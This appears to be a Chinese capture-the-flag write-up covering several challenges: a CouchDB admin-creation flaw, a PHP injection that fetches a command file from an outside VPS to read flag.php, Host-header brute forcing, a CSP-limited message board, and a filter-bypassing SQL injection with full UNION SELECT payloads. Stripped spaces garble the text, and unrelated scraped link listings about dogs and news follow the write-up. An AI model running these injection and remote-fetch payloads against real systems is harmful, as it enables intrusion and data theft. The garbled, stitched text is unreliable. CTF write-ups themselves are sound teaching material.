安恒ctf部分writeup//Neurohazard

看起来像是brainfuck、jsfuck之类的,直接试试浏览器console执行,恰好alert弹出flag。

大概

已知md5前缀密码为4位数字字母组合

WinHex打开替换内容为FFFFFFFFF…WinHex-右键选中-Edit-FillBlock以doc格式打开

结合题目说FLAG是某二进制状态的MD5哈希值。可以猜到这些段落宽度和二进制有关。得出了二进制,并该二进制内容进行md5哈希,获得flag。

拿到题目后发现80端口无法访问,于是扫了一波端口发现5984开放搜了一下,发现是CouchDB漏洞然后发现2017的CVE:CVE-2017-12635可以创建一个管理员用户

所以我们的攻击点就很清楚了,首先在我们的vps上放一个文件,里面精心构造好一个json_encode这里我们选择system(‘cat../flag.php’)可以构造:12345

然后这里传入的变量b只有15个字符可控,然后我计算了一下:1skysec.top/11.c

刚刚好15个字符于是将我们之前构造的文件命名为11.c放在域名为skysec.top的vps上然后构造12$a="asdfghjklzc.top/11.ctyuioqwertskysecwertyuioqwertyuiop"66cb1c378941c2cc0f1d7979ca595461

不知道这个题出的意义何在……我们访问页面得到信息:ProxyError:192.168.5.46

一开始没有思路,后来抓包修改HOST发现回显都是相同的12ProxyError:192.168.5.1ProxyError:192.168.5.2

然后随便蛇皮爆破了一下:1Host:192.168.5.132

可以发现flag

题目描述

由于忘记了账号密码,黑客想通过一个非法的途径找回自己的账号密码。突然发现有个留言板,黑客

拍了拍脑袋想到,我有办法了!最后黑客通过留言板成功登陆后台修改了自己忘记的密码。(答案为flag{}形式,提交{}内内容即可)

解题步骤

Content-Security-Policy:script-src‘self’:img-src*;```

题目描述老王经常喜欢去邻居家聊天,奈何邻居家经常放一只哈士奇看门。哈士奇比萨摩耶聪明,能分辨正常的人型生物不让靠近。老王发现只要自己套个头套之类,哈士奇就认不出来了。聪明的小伙伴快想出老王绕过看门狗的方法,去看看老王到底在里面聊些啥。(答案以flag{}形式过得,将flag{}中内容提交即可)

步骤一:打开链接,看到一个新闻列表。

步骤二:点开某条标题,看到新闻详情。

步骤三:用and1=1测试,发现会对注入做拦截。

步骤四:通过And1=1测试,发现可以绕过注入拦截。

步骤五:通过UnionSelect1,2,3,4,5#测试,发现有5个字段。

步骤六:通过UnionSelect1,database(),user(),version(),5#获取数据库的敏感数据,当前数据库为news。

步骤七:通过UnionSelect1,(selEcttable_namefRoMinfOrmation_schema.tableswhEreTABLE_SCHEMA=‘news’limit1,1),3,4,5#获得有一张tb_flag表。

步骤八:通过UnionSelect1,(selecTcolumn_namefrOminfoRmation_schema.columnswheretable_name=‘tb_flag’anDtable_schema=‘news’limit0,1),3,4,5#获得tb_flag只有一个flag字段。

步骤九:通过ldid=2UnionSelect1,(selecT*frOmtb_flag/**/limit0,1),3,4,5#获得flag{1396265adbb760c86475304b98e3f61c}

题目描述:

国家能源总部经过派出卧底长期刺探,终于找到一个潜伏已久的国外内鬼:三楼能源楼管老王。由于抓捕仓促,老王服毒自尽了。侦查部门搜出老王每日看的报纸原来是特制的情报。聪明的你能从附件的报纸中找出情报么?flag是老王说的暗号。(由于老王的线人曾今做的土匪,所以用的行话)

THE END
1.狗狗害怕鞭炮,主人帮忙制作耳罩,这下环境音变3D环绕了爆竹狗狗害怕鞭炮,主人帮忙制作耳罩,这下环境音变3D环绕了2024-11-18 09:52:26 逗趣乐园 山东 举报 0 分享至 0:00 / 0:00 速度 洗脑循环 Error: Hls is not supported. 视频加载失败 逗趣乐园 49粉丝 关注逗趣乐园,每天笑哈哈! 00:14 恒大歌舞团珊珊,身高一米八暴露了,脚下踩了30厘米! 00:14 儿子...https://www.163.com/v/video/VWGBA815K.html
2.抢劫头套图片抢劫头套动态图抢劫头套表情包gif动图下载SOOGIF为您提供抢劫头套动图大全,这里可以找到全部的抢劫头套gif动态图片,以及抢劫头套动图表情包供您下载使用,本次SOOGIF共为您找到89148张关于抢劫头套的动图内容。https://www.soogif.com/gif/766888-3-0-0.html
3.国内新闻新闻中心台一男子与看门狗培养感情 盗走邻居财物被法办 (2012年2月14日 08:48) 我国今年将重点治理出生人口...领奖头套恭候2.6亿得主 (2012年2月14日 02:57) 豪门让球不给力 (2012年2月14日 02:57) 太子https://news.sina.com.cn/china/2012-2-14/index.shtml
4.娱乐:从药神开始的娱乐巨星小说第六十九章 摘下头套!(求订阅!.. 第七十章 买年货(求订阅!!!) 第七十一章 爷的青春结束了!(求.. 第七十二章 两个农村仔!(求订阅.. 第七十三章 ...第1679章 免费的看门狗 第1680章 计划反攻 第1681章 为其懦弱 第1682章 劝说无果 第1683章 暗自窃喜 第1684章 阻止不了 第1685章 随了他的愿 第1686...http://tongren.faloo.com/book/715455.html
5.东北网2016年02月14日新闻汇总[8][东北网社会] 女子疑拒交保护费家里遭打砸看门狗被活活打死 2016-02-14 20:58 [9][东北网健康] 千余爱心人士关爱烫伤3岁男童 截至14日已收到...[906][东北网娱乐] 贾乃亮摘光头头套表情苦痛 网友:有点吓人 2016-02-14 09:50 [907][东北网社会] 太阳处于百年最安静状态或将迎来小冰河期 2016-02...https://www.dbw.cn/system/2016/02/14/0_20160214.shtml
1.看门狗:军团资讯游戏资讯中心《看门狗:伦敦》的实体版游戏封面遭到了泄露,主角以及身旁的角色都各自戴着不同的头套,一眼望去“谐”气冲天。 06-11 小编:紫菜蛋花汤 E3:育碧《看门狗3:军团》正式确认亮相!救救NPC! 今日,育碧官方正式确认《看门狗3:军团(Watch Dogs Legion)》将会在E3展会亮相!6月11日凌晨不见不散! 06-05 小编:笛音 ...https://www.ali213.net/news/34149/index_8.html
2.挂机游戏通往异世界最新章节免费阅读全本目录更新无删减第399章 看门狗 第400章 一起扬了 第401章 有点魔幻 第402章 鬼灵大将 第403章 巫祝 第...第906章 头套都给他们薅掉 第907章 耐心余额不足 第908章 巨浪 第909章 果断逃走 第910章https://www.qdmm.com/catalog/1037894056/
3.木偶奇遇记读后感(通用24篇)我渐渐长大了,一些其他的跟我同龄的人都会走路。大人们看到我出来玩,都是爸爸妈妈抱着就,都说我。我渐渐地开始自卑。爸爸看到我这样子,就帮我买了一个护头的头套,等你走路摔到的话就不会摔到头了。爸爸妈妈耐心地安慰我,叫我去学习走路。我听爸爸妈妈的'话,开始学走路。 https://www.fwsir.com/xinde/html/xinde_20220219120449_1650918.html